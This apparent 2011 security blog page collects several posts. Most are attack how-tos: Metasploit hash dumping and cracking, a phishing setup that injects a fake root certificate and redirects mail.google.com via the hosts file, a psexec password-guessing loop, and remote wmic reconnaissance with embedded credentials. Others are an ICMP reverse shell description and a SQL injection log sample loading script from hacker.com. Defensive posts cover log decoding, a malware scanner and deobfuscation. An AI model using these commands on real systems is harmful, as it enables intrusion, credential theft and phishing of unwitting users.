Oct 1, 2011

Howto: Install Backtrack 5 On Samsung Galaxy Tab 10.1 [P7500]

Do all the steps with you risk!!!!.

1. Download rooting file and transfer it to the tab
    - http://forum.xda-developers.com/attachment.php?attachmentid=593613&d=1305168395

2. Go into the recovery mode with hold "Power Button and Low Volumn Button" for rebooting and when you see the 2 icon press "Low Volumn" and press "High Volumn" or "Power Button" for go to recovery mode.

3. Choose "apply the update from sdcard" and choose "rooting file"

After this step, you're tab was rooted now.

4. Download requirement files
   -  P7500DXKH4_P7500OLBKH1_P7500XWKG1_HOME.tar.MD5  http://www.megaupload.com/?d=S6HSZL8H
   -  001001-P7500_KI1_Restock.zip  http://www.multiupload.com/5RMKLEFCTA
   -  001003-Overcome_10.1_Series_v1.1.0_P7500_Full.zip  http://www.multiupload.com/CRBRV18830
   -  002001-Overcome_CWM_Recovery_v4.1.1.5.tar  http://www.multiupload.com/REAMDK5J7U
   -   Overclock Kernel http://droidbasement.com/galaxy/kernels/2636/20/p4-ux/boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip

*** you can change Overcome_10.1_Series_v1.1.0_P7500_Full.zip to another Custom ROM just like Starburt or something like that.

5. Extract 001001-P7500_KI1_Restock.zip

6. Go into the recovery mode with hold "Power Button and Low Volumn Button" for rebooting and when you see the 2 icon press "High Volumn" or "Power Button" for go to download mode.

7. Open Odin3_v1.85 and click PDA -> P7500OXAKI1_P7500XXKI1_P7500XXKI1_HOME.tar.MD5 -> start

The tab will restart after this step is done.

8. Copy file Overcome_10.1_Series_v1.1.0_P7500_Full.zip and boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip to the tab

9. Go to the download mode again.

10. In the Odin, click PDA -> Overcome_CWM_Recovery_v4.1.1.5.tar -> start

11. Go to the recovery mode

12. Go to install menu -> choose zip from internal storage with data wipe -> Overcome_10.1_Series_v1.1.0_P7500_Full.zip -> install menu -> choose zip from internal storage -> boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip

13. Now you're root and get the new custom ROM. So install Android SDK and download Backtrack5 ARM version.
   - Android SDK http://developer.android.com/sdk/index.html#top
   - Backtrack 5 ARM http://www.backtrack-linux.org/downloads/

14. Copy Backtrack into your tab or use the adb for install busybox and upload Backtrack into the tab.
   - Go to C:\Program Files\Android\android-sdk\platform-tools
   - adb.exe shell
   - mkdir /sdcard/BT5
   - exit
   - adb.exe push busybox /sdcard/
adb.exe push installbusybox.sh /sdcard
   - adb.exe push fsrw /sdcard/BT5/
adb.exe push mountonly /sdcard/BT5/
adb.exe push bootbt /sdcard/BT5/
adb.exe push bt5.img.gz /sdcard/BT5/
adb.exe push unionfs /sdcard/BT5/

***If you use SSHDroid to enable SSHD in your tab.[Default SSH User: root and Password: admin]

15. Go to the terminal of Tab with ConnectBot and choose local to connect in your Tab. I don't know you can use sshd to complete this step or not but you can try it for easy typing.

16. Remove the Tab from PC.

17. Go to /sdcard/BT5 and unzip bt5.img.gz
   - cd /sdcard/BT5
   - gunzip bt5.img.gz

18. Start BT5
   - sh bootbt

19. So now you're in the chroot of Backtrack5

net.ipv4.ip_forward = 1
root@localhost:/# ls /pentest/
backdoors  database     exploits   passwords  scanners  stressing  voip
cisco      enumeration  forensics  python     sniffers  tunneling  web

19. Run the startvnc
  - startvnc

*** You can change resolution of vnc with nano /usr/bin/startvnc

20. Now vnc is running, you can check what is the port number that was use by vnc with
  - netstat -napt

21. Now you can connect vnc server with androidVNC or whatever that you can find in the Android Market.

*** Default password of vnc server is "toortoor"
22. Finally you can do anything that you can do in Backtrack5 on your Tab, have a nice hack :)

   - http://www.droidsans.com/node/31129
   - http://pauldotcom.com/2011/05/backtrack-5-install-on-samsung.html

If you like my blog, Please Donate Me

Howto: Windows Post Exploitation With John The Ripper In Metasploit 4 Or Ophcrack

This post will show you how to get the password after we can get into the victim machine.

1. Exploit victim with Metastploit

2. After got meterpreter shell, run post/windows/gather/hashdump to get password hashs.
  - meterpreter > run post/windows/gather/hashdump

3. Grab the list and send meterpreter shell into background process.
  - meterpreter > background 

4.  Use John The Ripper Module.
   - msf > use auxiliary/analyze/jtr_crack_fast
  - msf auxiliary(jtr_crack_fast) > run

5. List the credential for see results
   - msf auxiliary(jtr_crack_fast) > creds

6. So if you want to use ophcrack for cracking hashdump, Save the list of password hashs into the file[this post, we save into hashdump] and run this command in ophcrack folder
  - ophcrack-cli -d rainbowtables/ -t special,0,3:tables_xp_free_fast,0,3 -f hashdump

Source: http://www.securityartwork.es/2011/09/30/post-explotacion-con-john-the-ripper-y-ophcrack/ 

If you like my blog, Please Donate Me

Sep 30, 2011

Add Backtrack Tools Into Ubuntu11.04

1. Add key gpg for new repository
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Add Backtrack 5 repository into the list
   - vim /etc/apt/sources.list
   deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

3. Update the apt list.
   - apt-get update

4. Install what you want.

If you like my blog, Please Donate Me

Sep 29, 2011

Decoding Mysql Char() to Ascii With Shell Script

When I forensic some logs of websites, I found that many many attack use char() for evasion detection or hard to find malicious code. So I created this simple script for decoding all char() in the log file into ascii character for human reading.

./decoding_char_sql.sh logfiles.log

Example logfiles.log:

target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(8000))Char(60),Char(105),Char(109),Char(103),Char(32),Char(115),Char(114),Char(99),Char(61),Char(104),Char(116),Char(116),Char(112),Char(58),Char(47),Char(47),Char(104),Char(97),Char(99),Char(107),Char(101),Char(114),Char(46),Char(99),Char(111),Char(109),Char(63),Char(109),Char(97),Char(108),Char(105),Char(99),Char(105),Char(111),Char(117),Char(115),Char(46),Char(106),Char(115),Char(62),Char(60),Char(47),Char(105),Char(109),Char(103),Char(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

Decoding to:
target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(8000))<img src=http://hacker.com?malicious.js></img>+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

Please download this script from: http://www.wupload.com/file/223792731/decoding_char_sql.sh

If you like my blog, Please Donate Me

Sep 28, 2011

ICMP Shell

icmpsh - simple reverse ICMP shell

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python.

--- Running the Master ---

The master is straight forward to use. There are no extra libraries required for the C version. 
The Perl master however has the following dependencies:

 * IO::Socket
 * NetPacket::IP
 * NetPacket::ICMP

When running the master, don't forget to disable ICMP replies by the OS. For example:

 sysctl -w net.ipv4.icmp_echo_ignore_all=1

If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
commands send from the master.

--- Running the Slave ---

The slave comes with a few command line options as outlined below:

-t host            host ip address to send ping requests to. This option is mandatory!

-r                 send a single test icmp request containing the string "Test1234" and then quit. 
     This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
     the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.

-b num             limit of blanks (unanswered icmp requests before quitting

-s bytes           maximal data buffer size in bytes

In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.

Source: https://github.com/inquisb/icmpsh

If you like my blog, Please Donate Me

iScanner - Tool to detect and remove malicious codes and web page

iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files.
Current Features:
  • Ability to scan one file, directory or remote web page / website.
  • Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.
  • Extensive log shows the infected files and the malicious code.
  • Support for sending email reports.
  • Ability to clean the infected web pages automatically.
  • Easy backup and restore system for the infected files.
  • Simple and editable signature based database.
  • You can easily send malicious file to iScanner developers for analyzes.
  • Ability to update the database and the program easily from iScanner's server.
  • Very flexible options and easy to use.
  • Fast scanner with great performance.
  • Yes, it's FREE!!
Source: http://thehackernews.com/2011/09/iscanner-tool-to-detect-and-remove.html

If you like my blog, Please Donate Me

Java Deobfuscate Trick And Tools

     Normal Trick:
      1. Assign eval to a variable
        From: eval(code…);
        To: var x = eval(code…); document.write(x);

      2. Replace document.write() with alert()
        From: document.write(code…);
        To: alert(code…);

      3. Replace eval() with document.write()
        From: eval(code…);
        To: document.write(code…);

      4. Wrap code with alert()
        From: (window['code...
        To: alert((window['code...

      5. Surround output with textarea
        From: <script>code...</script>
        To: <script>document.write("<textarea cols=50 rows=50>");code...<document.write("</textarea>")</script>

This script looks for the DIV container which is up at the top and attaches HTML code to it. Here's the offending code:
document.getElementById(\"pdfplace\").innerHTML = \"<object width=\'0\' height=\'0\' frameborder=\'0\' type=\'application/pdf\' data=\'exp/pdf.php?user=admin&pdf_acces=on\'><param name=\'src\' value=\'1.pdf\'>\";
To get around this, here's what you can do. Replace this tag:
<div id="pdfplace"></div>
With this:

<textarea id="pdfplace" cols=50 rows=10></textarea>

And here is the result:

Source: http://www.kahusecurity.com/2010/deobfuscating-tricks/

    For Google Chrome:
      1. Right Click -> Choose "Inspect Element"
      2. Go to Scripts Tab
      3. Right Click -> De-obfuscate Source
Online Tools
    - Beautify Javascript http://jsbeautifier.org/
    - Addons Firefox:JavaScript Deobfuscator https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
    - JavaScript Formatter http://www.blackbeltcoder.com/Resources/JSFormatter.aspx
    - JavaScript Formatter http://javascript.about.com/library/blformat.htm
    - JavaScript Compressor http://dean.edwards.name/packer/
    - JavaScript Decompressor http://dean.edwards.name/unpacker/
    - Javascript Beautifier / Decryption / Unpacker http://www.bin2hex.com/javascript_beautify_decryption_deobfuscate.html

Extra Shellcode to exe http://sandsprite.com/shellcode_2_exe.php.

If you like my blog, Please Donate Me

Sep 25, 2011

Howto: Metasploit Post Exploitation With Inject CA

1. Create the certificate with impersonation-ssl module
 you can download the module from http://blog.c22.cc/2011/09/04/ssl-certificate-impersonation-for-shits-and-giggles/

2. Create phishing site with fake SSL certificate.

3. Get the injection module from https://dev.metasploit.com/redmine/issues/5503

4. Go to Metasploit and exploit the victim.

5. When you get the meterpreter shell, use

  meterpreter> background
  meterpreter> use auxialiary/windows/ca/myca
  meterpreter> set COMMAND inject_ca
  meterpreter> CAFILE=/root/.msf4/loot/yourfakekey.pem

  run post/windows/manage/myca COMMAND=inject_ca CAFILE=/root/.msf4/loot/youfakekey.pem

6. Inject the hostname into C:/Windows/system32/driver/etc/hosts with
  you can edit it with the shell

  run post/windows/manage/myca COMMAND=inject_host IP= DOMAIN=mail.google.com

 If you like my blog, Please Donate Me

Twitter’s t.co URL spoofing.

If you want the detail, please go to the Source.

So after I read the Source, I try to spoof it by myself with

Normal Link:

Target Link:

Spoofed Link:

Now when I browse with spoofed link, I will go to target link.

Source: http://blog.12k.nl/post/10604842941/twitters-t-co-url-spoofing

If you like my blog, Please Donate Me

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.

gathering System related information 


Running Services

C:\>tasklist /svc 

Installed Services

C:\>sc query state= all

Current environment settings


Find Username

C:\>set | find "USERNAME"

Find Domain

C:\>set | find "USERDOMAIN"

Find Current User Information

C:\>net user John 

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************

Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information

C:\>ipconfig /displaydns

OS Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 

Starting telnet service

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"
Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html 

If you like my blog, Please Donate Me